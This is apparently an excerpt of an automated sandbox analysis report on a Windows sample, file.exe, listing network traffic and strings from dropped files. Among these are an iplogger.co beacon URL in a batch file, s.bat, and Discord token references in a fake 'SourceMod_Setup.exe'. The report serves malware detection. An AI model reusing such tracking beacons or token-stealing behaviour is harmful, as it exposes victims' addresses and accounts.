Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficDNS traffic detected: DNS query: iplogger.co
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.drString found in binary or memory: http://earth.google.com/kml/2.0
Source: file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.drString found in binary or memory: http://earth.google.com/kml/2.1
Source: file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.drString found in binary or memory: http://earth.google.com/kml/2.2
Source: file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.drString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema
Source: file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.drString found in binary or memory: http://www.opengis.net/gml
Source: file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.drString found in binary or memory: http://www.opengis.net/kml/2.2
Source: file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.drString found in binary or memory: http://www.topografix.com/GPX/1/1
Source: file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.drString found in binary or memory: https://cdn.discordapp.com/illegal
Source: file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.drString found in binary or memory: https://discord.com/developers/docs/reference#authentication-example-bot-token-authorization-header
Source: file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.drString found in binary or memory: https://discord.com/illegal
Source: file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.drString found in binary or memory: https://github.com/go-sql-driver/mysql/wiki/old_passwords
Source: file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.drString found in binary or memory: https://github.com/go-sql-driver/mysql/wiki/strict-modeThe
Source: s.bat.0.drString found in binary or memory: https://iplogger.co/1tJFB4
Source: file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.drString found in binary or memory: https://status.discord.com/api/v2/i/o
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
